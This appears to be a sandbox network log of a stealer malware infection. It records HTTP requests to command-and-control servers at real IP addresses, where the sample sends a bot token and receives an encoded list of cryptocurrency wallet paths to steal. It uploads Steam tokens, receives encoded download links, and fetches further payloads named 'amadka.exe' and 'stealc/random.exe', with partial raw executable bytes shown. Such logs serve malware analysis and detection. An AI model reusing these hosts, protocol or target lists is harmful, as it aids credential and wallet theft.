                                            Server: Apache/2.4.41 (Ubuntu)
                                            Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                            ETag: "13bf0-5e7ebd4425100"
                                            Accept-Ranges: bytes
                                            Content-Length: 80880
                                            Content-Type: application/x-msdos-program
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                            Jul 2, 2024 08:26:30.897805929 CEST198OUTPOST /920475a59bac849d.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJEC
                                            Host: 85.28.47.4
                                            Content-Length: 1067
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jul 2, 2024 08:26:31.759093046 CEST202INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:30 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Content-Length: 0
                                            Keep-Alive: timeout=5, max=84
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Jul 2, 2024 08:26:31.815326929 CEST464OUTPOST /920475a59bac849d.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEB
                                            Host: 85.28.47.4
                                            Content-Length: 267
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 2d 2d 0d 0a
                                            Data Ascii: ------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="message"wallets------GIIJEBAECGCBKECAAAEB--
                                            Jul 2, 2024 08:26:31.994278908 CEST1236INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:31 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Vary: Accept-Encoding
                                            Content-Length: 2408
                                            Keep-Alive: timeout=5, max=83
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                            Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                            Jul 2, 2024 08:26:31.998675108 CEST462OUTPOST /920475a59bac849d.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----DBFHCGCGDAAKFIECFHDB
                                            Host: 85.28.47.4
                                            Content-Length: 265
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 43 47 43 47 44 41 41 4b 46 49 45 43 46 48 44 42 2d 2d 0d 0a
                                            Data Ascii: ------DBFHCGCGDAAKFIECFHDBContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------DBFHCGCGDAAKFIECFHDBContent-Disposition: form-data; name="message"files------DBFHCGCGDAAKFIECFHDB--
                                            Jul 2, 2024 08:26:32.185550928 CEST202INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:32 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Content-Length: 0
                                            Keep-Alive: timeout=5, max=82
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Jul 2, 2024 08:26:32.196485996 CEST560OUTPOST /920475a59bac849d.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECA
                                            Host: 85.28.47.4
                                            Content-Length: 363
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Data Raw: 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                            Data Ascii: ------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="file"------EBGIEGCFHCFHIDHIJECA--
                                            Jul 2, 2024 08:26:32.898799896 CEST202INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:32 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Content-Length: 0
                                            Keep-Alive: timeout=5, max=81
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Jul 2, 2024 08:26:32.960412025 CEST467OUTPOST /920475a59bac849d.php HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHI
                                            Host: 85.28.47.4
                                            Content-Length: 270
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 33 66 61 33 65 39 61 30 64 35 33 62 66 61 32 39 38 63 61 38 63 63 63 62 31 31 65 39 36 64 64 61 61 38 66 33 65 32 37 63 35 61 64 32 66 30 62 30 62 62 38 33 38 33 38 38 36 63 66 37 38 66 39 62 65 33 39 65 38 34 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 2d 2d 0d 0a
                                            Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="token"763fa3e9a0d53bfa298ca8cccb11e96ddaa8f3e27c5ad2f0b0bb8383886cf78f9be39e84------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="message"jbdtaijovg------BAKFCBFHJDHJKECAKEHI--
                                            Jul 2, 2024 08:26:33.698004961 CEST331INHTTP/1.1 200 OK
                                            Date: Tue, 02 Jul 2024 06:26:33 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Vary: Accept-Encoding
                                            Content-Length: 104
                                            Keep-Alive: timeout=5, max=80
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 63 33 4c 6a 6b 78 4c 6a 63 33 4c 6a 67 78 4c 32 31 70 62 6d 55 76 59 57 31 68 5a 47 74 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 66 47 68 30 64 48 41 36 4c 79 38 33 4e 79 34 35 4d 53 34 33 4e 79 34 34 4d 53 39 6a 62 33 4e 30 4c 32 64 76 4c 6d 56 34 5a 58 77 77 66 44 42 38 66 41 3d 3d
                                            Data Ascii: aHR0cDovLzc3LjkxLjc3LjgxL21pbmUvYW1hZGthLmV4ZXwwfDB8fGh0dHA6Ly83Ny45MS43Ny44MS9jb3N0L2dvLmV4ZXwwfDB8fA==


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.46388177.91.77.81807352C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:33.705861092 CEST77OUTGET /mine/amadka.exe HTTP/1.1
                                            Host: 77.91.77.81
                                            Cache-Control: no-cache
                                            Jul 2, 2024 08:26:34.438688993 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:34 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 1867264
                                            Last-Modified: Tue, 02 Jul 2024 05:44:13 GMT
                                            Connection: keep-alive
                                            ETag: "668393ad-1c7e00"
                                            Accept-Ranges: bytes
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 20 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 [TRUNCATED]
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELaf J@PJ@XlJJ @.rsrc@.idata @ )@vtxoxanzp0f@wrlrcnflJX@.taggant0 J"\@
                                            Jul 2, 2024 08:26:34.438714027 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jul 2, 2024 08:26:34.438730955 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jul 2, 2024 08:26:34.438812971 CEST672INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jul 2, 2024 08:26:34.438824892 CEST1236INData Raw: c4 a1 4a 01 aa 1a 3c a0 62 19 e2 b1 90 bb c1 fb 11 e5 2e ba 9e 19 4b 53 cf 89 a5 96 b1 03 e6 86 54 1a 5e 96 ba 68 14 d0 c1 32 c7 05 4b 07 e2 69 b9 ad 34 79 38 01 ca 85 0a 52 80 17 49 99 0a f4 9d 82 eb f9 18 9a 1a 09 bc 1f 0a 58 ea 15 96 a1 a9 c8
                                            Data Ascii: J<b.KST^h2Ki4y8RIXRE/RsFI'E=)aih})^xF.HEi$%Gn@N:JF$0@(y@SH$p
                                            Jul 2, 2024 08:26:34.438836098 CEST1236INData Raw: f1 ee c4 61 55 8f 1a 18 a3 89 eb 79 19 c5 bd 9d 94 1a e2 79 c1 8d 37 70 78 85 0a 24 81 92 dc 7a c9 79 01 e0 dc ee c2 90 84 a9 24 49 2f b9 c4 31 ba d5 2e e1 bf f8 4a e1 71 86 9a 01 ab e1 8c e7 48 f6 24 d3 6b 1b 2a 25 7b f2 da 3f 5d 19 02 ac 9b 89
                                            Data Ascii: aUyy7px$zy$I/1.JqH$k*%{?]Ky9G5jqy\.sERM+_rcnFaXY).DJq%=j*3Be52N)A%pEm4Pi
                                            Jul 2, 2024 08:26:34.438847065 CEST1236INData Raw: 7d a4 3f a4 8a dd 08 7b 77 b3 8e 80 14 00 db 95 9d fd f1 b4 95 8c 5e 28 35 f4 50 f5 50 b5 ef e3 41 ad 26 9a 4b a5 6a 89 7b 42 c1 a9 b6 ab a5 e0 77 f4 8e 41 3c 32 8c 42 e9 23 c6 bd b8 a9 12 38 79 16 62 83 81 cb d1 40 03 37 f6 20 a8 c6 a0 1b e3 bc
                                            Data Ascii: }?{w^(5PPA&Kj{BwA<2B#8yb@7 (4YEDVAM3s1J8fI,LvK$pJDNE=y9VQ.:B?ey?8P"6V4)B(q*r!2cAd/."i
                                            Jul 2, 2024 08:26:34.438858986 CEST1236INData Raw: bc 48 5e a7 3f 00 4d 30 e9 e9 bd c4 39 d8 9a eb 56 fc 6f 81 2e 84 78 c7 c4 b6 c0 72 50 f5 85 c5 d6 97 ce aa 55 08 ec 3b 80 a5 90 e7 af 3b 15 c7 70 ae f1 b1 70 25 09 30 9e fb ca bf ab 3c dd e8 87 6f 85 cd 01 2e 25 fe c4 93 d2 9d c9 c1 bc e6 5f f8
                                            Data Ascii: H^?M09Vo.xrPU;;pp%0<o.%_Y[wXx9d.0eT^UYm6d9K2(Up7;Ko&yebt].\>o2:W\j[@62D7@UC
                                            Jul 2, 2024 08:26:34.439019918 CEST1236INData Raw: 8b e1 24 17 21 8d 1d 3b d2 d1 d3 8d 54 dd f4 c5 b3 f6 e0 7e 9b de 0b 7c 4c dd 14 a0 00 fd e6 86 4b 4c 7a 77 84 18 17 fe 00 c2 f1 af b6 1b c2 f1 39 08 02 5c 9a 75 79 2e b9 87 be 71 71 b3 d3 01 c3 1a 46 a5 10 a9 8d 0b 01 67 5b 9e 46 4d 0a f9 86 c1
                                            Data Ascii: $!;T~|LKLzw9\uy.qqFg[FMjD]PzD+YaC+?SR}fm??yavn8#oC+CE\yi<DvDM{Fu~WeWI92*I4`Bj
                                            Jul 2, 2024 08:26:34.439033031 CEST1236INData Raw: b8 5d 00 8e 61 a8 c8 8f af 89 53 b3 bc 54 5d 7f 2a 97 9d ea d9 b7 6c 4e c7 3d 99 fa 8a 88 22 8e c9 5f ed 05 46 06 84 19 34 57 45 f6 6c 0b 8f cf 86 c8 51 4f 1e 45 91 b1 ba 82 38 fc 84 d8 5c c5 2a e7 d0 97 c0 60 2d d6 f5 e9 e6 b9 d1 0a 1a e7 b8 86
                                            Data Ascii: ]aST]*lN="_F4WElQOE8\*`-qE&|MEy8vq~E\,!xNDL#~[97:}cYj[evD"*|TwI'z6"Lo(_KgZ~
                                            Jul 2, 2024 08:26:34.443813086 CEST1236INData Raw: 4b ec 40 c5 bb 67 8f fa 8a 82 d6 87 06 4a 44 df 64 c7 e2 f3 b7 0b dd f9 c3 b2 70 44 c3 28 04 55 36 9d cb 2a 45 be f9 d9 39 04 41 fc 55 d2 0c 57 43 be e3 fb 5b 22 01 25 7b d1 ba bb c2 41 8d db dc d4 3c 6c 12 65 1c c6 a0 14 d5 f1 f2 9d 6e c7 43 c3
                                            Data Ascii: K@gJDdpD(U6*E9AUWC["%{A<lenCE3Cm>L*`Q-(F/yyEZq0T~n=&^*\L[mH)A_X~"L'r @*B3jzIG@Zz]}K8


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.46389377.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:43.578114033 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:26:44.314119101 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:44 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:26:44.315187931 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:26:44.549247026 CEST283INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:44 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 35 64 0d 0a 20 3c 63 3e 31 30 30 30 30 30 36 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 62 30 64 35 64 61 32 63 38 35 30 36 37 33 62 35 64 37 36 61 63 31 63 65 38 63 63 64 34 61 36 65 37 66 31 66 62 64 39 37 65 39 63 34 35 34 33 62 33 31 64 65 31 35 34 34 31 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 5d <c>1000006001+++b5937c1a99d5f9db0d5da2c850673b5d76ac1ce8ccd4a6e7f1fbd97e9c4543b31de15441#<d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.46389477.91.77.81808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:44.606792927 CEST54OUTGET /stealc/random.exe HTTP/1.1
                                            Host: 77.91.77.81
                                            Jul 2, 2024 08:26:45.304533958 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:45 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 2453504
                                            Last-Modified: Tue, 02 Jul 2024 04:03:03 GMT
                                            Connection: keep-alive
                                            ETag: "66837bf7-257000"
                                            Accept-Ranges: bytes
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f6 41 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 20 16 bd 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 bd 00 00 04 00 00 00 00 